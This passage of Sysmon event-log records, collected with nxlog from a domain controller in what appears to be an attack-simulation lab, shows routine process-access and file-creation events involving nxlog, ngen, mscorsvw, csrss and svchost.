{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:30.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:30.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:30.729\r\nProcessGuid: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nProcessId: 2908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\PresentationCore.dll\r\nCreationUtcTime: 2020-08-01 07:00:30.729","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:30.729","ProcessGuid":"{E2A3D6B1-1304-5F25-0000-00107EB40A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\PresentationCore.dll","CreationUtcTime":"2020-08-01 07:00:30.729","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:30.917\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-130E-5F25-0000-001082BD0A00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:30.917","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-130E-5F25-0000-001082BD0A00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:30.917\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-130E-5F25-0000-001082BD0A00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:30.917","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-130E-5F25-0000-001082BD0A00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:30.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-130E-5F25-0000-001082BD0A00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:30.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-130E-5F25-0000-001082BD0A00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:31.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:31.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:31.729\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-130F-5F25-0000-001053C20A00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:31.729","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-130F-5F25-0000-001053C20A00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:31.729\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-130F-5F25-0000-001053C20A00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:31.729","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-130F-5F25-0000-001053C20A00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:31.729\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-130F-5F25-0000-001053C20A00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 